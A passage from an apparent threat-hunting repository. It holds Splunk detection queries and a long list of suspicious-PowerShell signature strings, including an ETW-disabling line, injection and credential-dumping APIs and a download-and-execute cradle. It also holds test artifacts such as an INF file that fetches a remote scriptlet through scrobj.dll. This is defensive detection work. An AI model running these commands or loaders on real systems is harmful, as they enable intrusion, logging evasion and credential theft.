4 | | eval indicator_group = "Host: ".hostname_ip." User: ".username." Image: ".image." CommandLine: ".commandline." ParentImage: ".parent_image
5 | | transaction indicator_group, hostname_ip, username, image, commandline, parent_image mvraw=true delim="$:$"
6 |
--------------------------------------------------------------------------------
/Splunk/roastiekerb:
--------------------------------------------------------------------------------
1 | sourcetype="*WinEventLog:Security" EventCode=4769 ServiceName!=krbtgt ServiceName!="*$" TargetUserName!="*$@*" TicketEncryptionType=0x17 | rex field=Target_User_Name "^(?<user>.*)@"
2 | | where user != ServiceName| stats values(ServiceName) as ServiceName values(Status), values(TicketOptions), values(TicketEncryptionType), dc(ServiceName) as distinctservicecount by user| where distinctservicecount > 5
3 |
--------------------------------------------------------------------------------
/Splunk/scheduledtaskCMDLine:
--------------------------------------------------------------------------------
1 | source="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1 (Image="*\\at.exe" CommandLine="*cmd //c*" OR CommandLine=*:\\*) OR (Image="*\\schtasks.exe" CommandLine="*create*" CommandLine="*/s *")
2 |
--------------------------------------------------------------------------------
/Splunk/selfdelete:
--------------------------------------------------------------------------------
1 | source=*WinEventLog:Security EventCode=4688 cmd.exe del
2 | | search NewProcessName="*\\cmd.exe" CommandLine="*ping *> Nul & del *" OR CommandLine="*choice*&*del *"
3 |
--------------------------------------------------------------------------------
/Splunk/shimreg:
--------------------------------------------------------------------------------
1 | sourcetype="*WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=12 TargetObject="HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\*"
2 |
--------------------------------------------------------------------------------
/Splunk/shimsdb:
--------------------------------------------------------------------------------
1 | source=*WinEventLog:Security EventCode=4688 NewProcessName="C:\\Windows\\System32\\sdbinst.exe" OR NewProcessName="C:\\Windows\\SysWOW64\\sdbinst.exe"
2 |
--------------------------------------------------------------------------------
/Splunk/singlecharproc:
--------------------------------------------------------------------------------
1 | source=*WinEventLog:Security EventCode=4688
2 | | eval Filename=mvindex(split(NewProcessName,"\\"),-1)
3 | | eval Filename_Length = length(replace(Filename, "\.[^.]+$", ""))
4 | | search Filename_Length=1
5 |
--------------------------------------------------------------------------------
/Splunk/startupexe:
--------------------------------------------------------------------------------
1 | source="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1 ParentImage="*\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\*"
2 |
--------------------------------------------------------------------------------
/Splunk/susprecyclebinfiles:
--------------------------------------------------------------------------------
1 | sourcetype="*WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=11 TargetFilename="*\\$recycle.bin\\*" file_name=*.exe OR file_name=*.rar OR file_name=*.zip OR file_name=*.dll OR file_name=*.bat OR file_name=*.cmd OR file_name=*.js OR file_name=*.vbs OR file_name=*.cs OR file_name=*.ps1 OR file_name=*.psm OR file_name=*.psd
2 | |rename Computer as hostname_ip, Image as image, file_path as filepath, file_name as filename
3 | | eval indicator_group = "Host: " . hostname_ip . " Image: " . image . " FilePath: " . filepath. " FileName: " . filename
4 | | table indicator_group, hostname_ip, image, filepath, filename
5 |
--------------------------------------------------------------------------------
/Splunk/trackerdllinj:
--------------------------------------------------------------------------------
1 | tracker| search sourcetype="*WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1 Filename=Tracker.exe
2 |
--------------------------------------------------------------------------------
/Splunk/vaultcmd:
--------------------------------------------------------------------------------
1 | sourcetype=*WinEventLog:Microsoft-Windows-Sysmon/Operational EventCode=1 Filename=vaultcmd.exe CommandLine="* /list*"
2 |
--------------------------------------------------------------------------------
/Splunk/w3wpchild:
--------------------------------------------------------------------------------
1 | sourcetype="*WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1 ParentFilename=w3wp.exe Filename=cmd.exe OR Filename=powershell.exe
2 |
--------------------------------------------------------------------------------
/Splunk/wevtutil:
--------------------------------------------------------------------------------
1 | source=*WinEventLog:Security EventCode=4688 wevtutil.exe
2 | | search (CommandLine="*sl*" OR CommandLine="*set-log*" OR CommandLine="*cl*") (CommandLine="*security*" OR CommandLine="*sysmon*" OR CommandLine="*powershell*" OR CommandLine="*application*")
3 | | search NOT CommandLine="*wevtutil epl*" AND NOT CommandLine="*wevtutil export-log*"
4 | | search NOT CommandLine="*/bu*"
5 |
--------------------------------------------------------------------------------
/Splunk/wmitraceprocesscreate:
--------------------------------------------------------------------------------
1 | source="*WinEventLog:Microsoft-Windows-WMI-Activity/Trace" EventCode=11 Operation="*Win32_Process::Create*"
2 |
--------------------------------------------------------------------------------
/SuspiciousPowershellScriptText:
--------------------------------------------------------------------------------
1 | *[Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0)*
2 | *[System.IO.FileStream] $* = New-Object System.IO.FileStream($*, [System.IO.FileMode]::Create, [System.IO.FileAccess]::Write, [System.IO.FileShare]::None, $*)*
3 | *if ($* -gt ($* - 1) -or $* -lt 0) {Throw "StartByte range must be between 0 and $*"}*
4 | *Invoke-WmiMethod @WmiMethodArgs -Namespace 'Root\default' -Class 'StdRegProv' -Name 'CheckAccess' -ArgumentList $*, $*, $*
5 | *Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }*
6 | *$*.ToString("X$($*2)") -split '([A-F0-9]{2})' | ForEach-Object { if ($_) { $* += [Byte] ('0x{0}' -f $_) } }*
7 | *Invoke(0x001F0FFF, $*, $*)*
8 | *Invoke($*, [IntPtr]::Zero, $*.Length + 1, 0x3000, 0x40)*
9 | *Invoke($*, $*, $*, $*.Length, [Ref] 0) | Out-Null*
10 | *Invoke([IntPtr]::Zero, $*.Length + 1, 0x3000, 0x40)*
11 | *Invoke([IntPtr]::Zero, $*.Length + 1, 0x3000, 0x40)*
12 | *@(Get-WmiObject -Query 'SELECT AddressWidth FROM Win32_Processor')[0] | Select-Object -ExpandProperty AddressWidth*
13 | *Get-DelegateType @([IntPtr], [IntPtr], [Byte[]], [UInt32], [UInt32].MakeByRefType()) ([Bool])*
14 | *[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($*, $*)*
15 | *Get-DelegateType @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr])*
16 | *DefineDynamicAssembly($*, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)*
17 | *DefineLiteral('x64', [UInt16] 0x8664) | Out-Null*
18 | *DefineField('ImageBase', [UInt32], 'Public')).SetOffset(28) | Out-Null*
19 | *DefineType('IMAGE_NT_HEADERS32', $*, [System.ValueType], 248)*
20 | *Get-DelegateType @([IntPtr], [IntPtr], [IntPtr], [IntPtr], [UInt32], [UInt32].MakeByRefType()) ([IntPtr])*
21 | *[System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Value.GetType()) * 2*
22 | *[IntPtr]$* = [IntPtr](Add-SignedIntAsUnsigned ($*) ($*))*
23 | *[System.Runtime.InteropServices.Marshal]::WriteByte($*, $*, $Bytes[$*])*
24 | *DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $*, $*)*
25 | *OpenThreadToken.Invoke($*, $*.TOKEN_QUERY -bor $*.TOKEN_ADJUST_PRIVILEGES, $*, [Ref]$*)*
26 | *[System.Runtime.InteropServices.Marshal]::PtrToStructure($*, [Type]$*.TOKEN_PRIVILEGES)*
27 | *NtCreateThreadEx.Invoke([Ref]$*, 0x1FFFFF, [IntPtr]::Zero, $*, $*, $*, $*, 0, 0xffff, 0xffff, [IntPtr]::Zero)*
28 | *[IntPtr](Add-SignedIntAsUnsigned ([Int64]$*) ([Int64][UInt64]$*.e_lfanew))*
29 | *DefineDynamicAssembly($*, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)*
30 | *DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $*, $*)*
31 | *Seek(0x3c, [System.IO.SeekOrigin]::Begin) | Out-Null*
32 | *New-Object IO.Compression.DeflateStream ($*, [IO.Compression.CompressionMode]::Compress)*
33 | *Get-WmiObject CommandLineEventConsumer -Namespace root\subscription -filter "name='Updater'" | Remove-WmiObject*
34 | *'`"$($Env:SystemRoot)\System32\WindowsPowerShell\v1.0\powershell.exe -NonInteractive`"'*
35 | *[Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]'Administrator')*
36 | *[Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()*
37 | *Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages'*
38 | *::EnumerateSecurityPackages([Ref] $*, [Ref] $*)*
39 | *New-Object System.IO.Pipes.NamedPipeServerStream($*,"InOut",100, "Byte", "None", 1024, 1024, $*)*
40 | *[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($*, $*)*
41 | *Invoke($*, $*, $*, 0xF003F, 0x10, 0x3, 0x1, $*, $*, $*, $*, $*, $*)*
42 | *(New-Object -TypeName 'System.Security.Principal.SecurityIdentifier' -ArgumentList ([Security.Principal.WellKnownSidType]::'LocalSystemSid', $*)).Translate([Security.Principal.NTAccount]).Value*
43 | *([System.math]::Pow(2, $*)-1) * ([System.Math]::Pow(2,(32 - $*)))*
44 | *@(80,23,443,21,3389,110,445,139,143,53,135,3306,8080,22*
45 | *new-object System.Net.Sockets.TcpClient $*.AddressFamily*
46 | *Register-ObjectEvent -InputObject $*[$*] -EventName Elapsed -Action $* | Out-Null*
47 | *[System.IO.FileStream] $* = New-Object System.IO.FileStream($*, [System.IO.FileMode]::Create, [System.IO.FileAccess]::Write, [System.IO.FileShare]::None, $*)*
48 | *[Runtime.InteropServices.MarshalAsAttribute].GetConstructors()[0]*
49 | *Emit([Reflection.Emit.OpCodes]::Ldtoken, $*)*
50 | *New-Object System.Threading.Mutex $*,'CSVMutex';*
51 | *([Net.Dns]::GetHostEntry($*)).AddressList)*
52 | *(New-Object System.Security.Principal.NTAccount($*, $*))*
53 | *Translate( [System.Security.Principal.NTAccount]).Value*
54 | *OpenSubkey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings")*
55 | *New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $*
56 | *GetAccessRules($*,$*,[System.Security.Principal.SecurityIdentifier])*
57 | *GetType().InvokeMember("HighPart", [System.Reflection.BindingFlags]::GetProperty, $*, $*, $*)*
58 | *New-Object System.DirectoryServices.DirectorySearcher([ADSI]$*)*
59 | *Get-DomainSearcher -Domain $* -DomainController $* -PageSize $* -Credential $*
60 | *Get-DomainSearcher -Domain $* -DomainController $* -PageSize $* -Credential $* -ADSprefix "DC=$($*),CN=MicrosoftDNS,DC=DomainDnsZones"*
61 | *New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Domain', $*)*
62 | *New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Forest', $*, $*.UserName, $*.GetNetworkCredential().Password)*
63 | *New-Object -TypeName System.DirectoryServices.AccountManagement.PrincipalContext -ArgumentList ([System.DirectoryServices.AccountManagement.ContextType]::Domain), $*
64 | *([ADSI]"WinNT://$*/$*,group").add("WinNT://$*/$*,user")*
65 | *New-Object -TypeName System.DirectoryServices.AccountManagement.PrincipalContext -ArgumentList $*, $*
66 | *filter="(&(name=$*)(distinguishedname=$*)$*)"*
67 | *filter="(&(objectCategory=organizationalUnit)(name=$*))"*
68 | *($* -cmatch "^DWM-.*" -and $* -cmatch "^Window\sManager$")*
69 | *($* -cmatch "NT\sAUTHORITY" -or $* -cmatch "Window\sManager")*
70 | *Get-WinEvent -LogName "Microsoft-Windows-AppLocker/EXE and DLL" -ErrorAction SilentlyContinue | Where {$_.Id -eq 8002}*
71 | *Get-WinEvent -LogName "Microsoft-Windows-PowerShell/Operational" -ErrorAction SilentlyContinue | Where {$_.Id -eq 4100}*
72 | *Get-ChildItem "HKU:\$($*)\Software\Microsoft\Terminal Server Client\Servers" -ErrorAction SilentlyContinue*
73 | *'[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};$* = New-Object Net.WebClient;$*.Proxy=[Net.WebRequest]::GetSystemWebProxy();$*.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;Invoke-Expression $*.downloadstring('''+$*+''');'*
74 | *[System.Diagnostics.Process]::Start($*)*
75 | *DynAssembly = New-Object System.Reflection.AssemblyName('MethodLeakAssembly')*
76 | *Emit([System.Reflection.Emit.OpCodes]::Ldarg_0)*
77 | *[Byte[]] @(0x60,0xE8,0x04,0,0,0,0x61,0x31,0xC0,0xC3)*
78 | *[Byte[]] @(0x41,0x54,0x41,0x55,0x41,0x56,0x41,0x57,0x55,0xE8,0x0D,0x00,0x00,0x00,0x5D,0x41,0x5F,0x41,0x5E,0x41,0x5D,0x41,0x5C,0x48,0x31,0xC0,0xC3)*
79 | *New-Object System.Web.Script.Serialization.JavaScriptSerializer*
80 | *Get-Content -Path "$Env:systemdrive\Users\$UserName\AppData\Local\Google\Chrome\User Data\Default\History"|Select-String -AllMatches $* |% {($_.Matches).Value} |Sort -Unique*
81 | *Get-ChildItem 'HKU:\' -ErrorAction SilentlyContinue | Where-Object { $_.Name -match 'S-1-5-21-[0-9]+-[0-9]+-[0-9]+-[0-9]+$' }*
82 | *Get-ChildItem -Path "$Env:systemdrive\Users\" -Filter "*.url" -Recurse -ErrorAction SilentlyContinue*
83 | *"$Env:systemdrive\Users\$UserName\AppData\Roaming\Mozilla\Firefox\Profiles\"*
84 | *New-Object System.Windows.Forms.TextBox*
85 | *($*.Text.Length -ne 0) -and ($*.Text.Length -ne $*)*
86 | *$TypeBuilder.DefineMethod('GetAsyncKeyState', 'Public, Static', [Int16], [Type[]] @([Windows.Forms.Keys]))*
87 | *$TypeBuilder.DefineMethod('MapVirtualKey', 'Public, Static', [Int32], [Type[]] @([Int32], [Int32]))*
88 | *ConnectionString = "Server=$*$*;Database=$*;Integrated Security=SSPI;Connection Timeout=1"*
89 | *ConnectionString = "Server=$*$*;Database=$*;Integrated Security=SSPI;uid=$*;pwd=$*;Connection Timeout=$*"*
90 | *ConnectionString = "Server=$*$*;Database=$*;User ID=$*;Password=$*;Connection Timeout=$*"*
91 | *New-Object -TypeName System.Data.SqlClient.SqlCommand -ArgumentList ($*, $*)*
92 | *New-Object Drawing.Bitmap $*.Width, $*.Height;*
93 | *New-Object System.Drawing.Imaging.EncoderParameters;*
94 | *New-Object IntPtr ($*.ToInt64()+$*)*
95 | *TVqQAAMA*
96 | *"" + $*.padright(256, "?") + ""*
97 | *$* -ne [Management.Automation.PSCredential]::Empty*
98 | *[Reflection.Assembly]::LoadWithPartialName('System.IdentityModel')*
99 | *filter = "(&(samAccountType=805306368)$*)"*
100 | *[System.Runtime.InteropServices.Marshal]::AllocHGlobal($*)*
101 | *([Int] $*.DllCharacteristics -band $*.IMAGE_DLLCHARACTERISTICS_NX_COMPAT) -ne $*.IMAGE_DLLCHARACTERISTICS_NX_COMPAT*
102 | *[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($*, $*)*
103 | *powershell_reflective_*
104 | *TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncm*
105 | [Int16]$* = '0x{0}' -f ((($*[($*+1)..($*)]) | % {$_.ToString('X2')}) -join '')
106 | [system.runtime.interopservices.marshal]::StructureToPtr($*, $*, $*)
107 | [Int32]$* = '0x{0}' -f ((($*[($*+19)..($*+16)]) | % {$_.ToString('X2')}) -join '')
108 | $* = [System.Runtime.InteropServices.Marshal]::ReadInt32($($*.ToInt64())+4)
109 | $* = [*]::CreateFileTransacted($*.TargetPath,0xC0000000,0,[IntPtr]::Zero,2,0x80,[IntPtr]::Zero,$*,[IntPtr]::Zero,[IntPtr]::Zero)
110 | $* = [*]::NtCreateSection([ref]$hSection,0xF001F,[IntPtr]::Zero,[ref]$LargeInteger,2,0x1000000,$hTransactedFile)
111 | $* = [*]::NtCreateProcessEx([ref]$*,0x1FFFFF,[IntPtr]::Zero,$*,4,$*,[IntPtr]::Zero,[IntPtr]::Zero,0)
112 | $* = [*]::NtCreateThreadEx([ref]$*,0x1FFFFF,[IntPtr]::Zero,$*,[IntPtr]$*,[IntPtr]::Zero,$*,0,0,0,[IntPtr]::Zero)
113 | $* = [Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static');
114 | $* = New-Object System.Diagnostics.Eventing.EventProvider -ArgumentList @([Guid]::NewGuid());
115 | *ExecuteShellCommand*
116 | *GetDelegateForFunctionPointer*
117 | *GetModuleHandle*
118 | *GetProcAddress*
119 | *Groups.User.Properties.cpassword*
120 | *IMAGE_NT_OPTIONAL_HDR64_MAGIC*
121 | *InteropServices.HandleRef*
122 | *kernel32.dll*
123 | *LSA_UNICODE_STRING*
124 | *Management.Automation.RuntimeException*
125 | *Metasploit*
126 | *Microsoft.Win32.UnsafeNativeMethods*
127 | *MiniDumpWriteDump*
128 | *msvcrt.dll*
129 | *OpenProcess*
130 | *PAGE_EXECUTE_READ*
131 | *psremoting*
132 | *pssession*
133 | *ReadProcessMemory.Invoke*
134 | *Reflection.Emit.CustomAttributeBuilder*
135 | *Reflection.Emit.OpCodes*
136 | *ScheduledTasks.Task.Properties.cpassword*
137 | *SE_PRIVILEGE_ENABLED*
138 | *Security.Cryptography.CryptoStream*
139 | *SECURITY_DELEGATION*
140 | *System.BitConverter*
141 | *System.DirectoryServices.ActiveDirectory*
142 | *System.DirectoryServices.DirectorySearcher*
143 | *system.dll*
144 | *System.IdentityModel.Tokens.KerberosRequestorSecurityToken*
145 | *Add-Type*
146 | *DllImport*
147 | *DefineDynamicAssembly*
148 | *DefineDynamicModule*
149 | *DefineType*
150 | *DefineConstructor*
151 | *CreateType*
152 | *DefineLiteral*
153 | *DefineEnum*
154 | *DefineField*
155 | *ILGenerator*
156 | *Emit*
157 | *UnverifiableCodeAttribute*
158 | *DefinePInvokeMethod*
159 | *GetTypes*
160 | *GetAssemblies*
161 | *Methods*
162 | *Properties*
163 | *GetConstructor*
164 | *GetConstructors*
165 | *GetDefaultMembers*
166 | *GetEvent*
167 | *GetEvents*
168 | *GetField*
169 | *GetFields*
170 | *GetInterface*
171 | *GetInterfaceMap*
172 | *GetInterfaces*
173 | *GetMember*
174 | *GetMembers*
175 | *GetMethod*
176 | *GetMethods*
177 | *GetNestedType*
178 | *GetNestedTypes*
179 | *GetProperties*
180 | *GetProperty*
181 | *InvokeMember*
182 | *MakeArrayType*
183 | *MakeByRefType*
184 | *MakeGenericType*
185 | *MakePointerType*
186 | *DeclaringMethod*
187 | *DeclaringType*
188 | *ReflectedType*
189 | *TypeHandle*
190 | *TypeInitializer*
191 | *UnderlyingSystemType*
192 | *InteropServices*
193 | *Marshal*
194 | *AllocHGlobal*
195 | *PtrToStructure*
196 | *StructureToPtr*
197 | *FreeHGlobal*
198 | *IntPtr*
199 | *MemoryStream*
200 | *DeflateStream*
201 | *FromBase64String*
202 | *EncodedCommand*
203 | *Bypass*
204 | *ToBase64String*
205 | *ExpandString*
206 | *GetPowerShell*
207 | *OpenProcess*
208 | *VirtualAlloc*
209 | *VirtualFree*
210 | *WriteProcessMemory*
211 | *CreateUserThread*
212 | *CloseHandle*
213 | *GetDelegateForFunctionPointer*
214 | *kernel32*
215 | *CreateThread*
216 | *memcpy*
217 | *LoadLibrary*
218 | *GetModuleHandle*
219 | *GetProcAddress*
220 | *VirtualProtect*
221 | *FreeLibrary*
222 | *ReadProcessMemory*
223 | *CreateRemoteThread*
224 | *AdjustTokenPrivileges*
225 | *WriteByte*
226 | *WriteInt32*
227 | *OpenThreadToken*
228 | *PtrToString*
229 | *ZeroFreeGlobalAllocUnicode*
230 | *OpenProcessToken*
231 | *GetTokenInformation*
232 | *SetThreadToken*
233 | *ImpersonateLoggedOnUser*
234 | *RevertToSelf*
235 | *GetLogonSessionData*
236 | *CreateProcessWithToken*
237 | *DuplicateTokenEx*
238 | *OpenWindowStation*
239 | *OpenDesktop*
240 | *MiniDumpWriteDump*
241 | *AddSecurityPackage*
242 | *EnumerateSecurityPackages*
243 | *GetProcessHandle*
244 | *DangerousGetHandle*
245 | *CryptoServiceProvider*
246 | *Cryptography*
247 | *RijndaelManaged*
248 | *SHA1Managed*
249 | *CryptoStream*
250 | *CreateEncryptor*
251 | *CreateDecryptor*
252 | *TransformFinalBlock*
253 | *DeviceIoControl*
254 | *SetInformationProcess*
255 | *PasswordDeriveBytes*
256 | *GetAsyncKeyState*
257 | *GetKeyboardState*
258 | *GetForegroundWindow*
259 | *BindingFlags*
260 | *NonPublic*
261 | *ScriptBlockLogging*
262 | *LogPipelineExecutionDetails*
263 | *ProtectedEventLogging*
264 | *adsisearcher*
265 | *[Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey*
266 | *[Net.Dns]::GetHostEntry*
267 | *[System.Convert]::ToBase64String*
268 | *[System.Convert]::FromBase64String*
269 | *[System.Reflection.BindingFlags]::GetProperty*
270 | *0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4*
271 | *BeginConnect*
272 | *ConvertTo-SecureString*
273 | *DirectoryServices.DirectoryEntry*
274 | *DsEnumerateDomainTrusts*
275 | *iex*
276 | *Invoke-Command*
277 | *Invoke-Expression*
278 | *powershell.exe*
279 | *Reflection.Assembly*
280 | *Runtime.InteropServices*
281 | *System.Management.Automation.WindowsErrorReporting*
282 | *System.MulticastDelegate*
283 | *System.Net.IPAddress*
284 | *System.Net.Http*
285 | *System.Net.Sockets*
286 | *System.Net.WebClient*
287 | *System.Random*
288 | *System.Reflection.CallingConventions*
289 | *System.Security.AccessControl.AccessControlType*
290 | *System.Security.Cryptography*
291 | *System.Threading.Mutex*
292 | *System.Web.Script*
293 | *TOKEN_ADJUST_PRIVILEGES*
294 | *TOKEN_ALL_ACCESS*
295 | *TOKEN_ASSIGN_PRIMARY*
296 | *TOKEN_DUPLICATE*
297 | *TOKEN_ELEVATION*
298 | *TOKEN_IMPERSONATE*
299 | *TOKEN_INFORMATION_CLASS*
300 | *TOKEN_PRIVILEGES*
301 | *TOKEN_QUERY*
302 | *wsman*
303 | *New-JobTrigger*
304 | *NTLMSSPNegotiate_InitialContextTokenID*
305 | *MMC20.Application*
306 | *[Activator]::CreateInstance([type]::GetTypeFromProgID*
307 | *Microsoft.Build.Evaluation.Project*
308 |
--------------------------------------------------------------------------------
/XMLcradle.txt:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | Get-WmiObject Win32_Process -Computer 'localhost'
5 |
6 |
7 |
--------------------------------------------------------------------------------
/cmd.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewDemaske/ThreatHuntingStuff/e3fb6434fb6b8e7ee10cec52e5487922734f4ad6/cmd.exe
--------------------------------------------------------------------------------
/evil.inf:
--------------------------------------------------------------------------------
1 | [Version]
2 | Signature=$POO$
3 |
4 | [DefaultInstall]
5 | UnregisterDlls = Poo
6 |
7 | [Poo]
8 | 11,,scrobj.dll,2,60,https://raw.githubusercontent.com/MatthewDemaske/ThreatHuntingStuff/master/evil.sct
9 |
--------------------------------------------------------------------------------
/evil.sct:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
11 |
12 |
13 |
21 |
22 |
23 |
--------------------------------------------------------------------------------
/generictest.txt:
--------------------------------------------------------------------------------
1 | Write-Host "Boop" -ForegroundColor Green
2 |
--------------------------------------------------------------------------------
/sendkeysPSCradle:
--------------------------------------------------------------------------------
1 | $wshell = New-Object -ComObject wscript.shell $wshell.run("notepad") $wshell.AppActivate('Untitled - Notepad')
2 | Start-Sleep 2 $wshell.SendKeys('^o')
3 | Start-Sleep 2 $wshell.SendKeys('') $wshell.SendKeys('~')
4 | Start-Sleep 5 $wshell.SendKeys('^a') $wshell.SendKeys('^c')
5 |
--------------------------------------------------------------------------------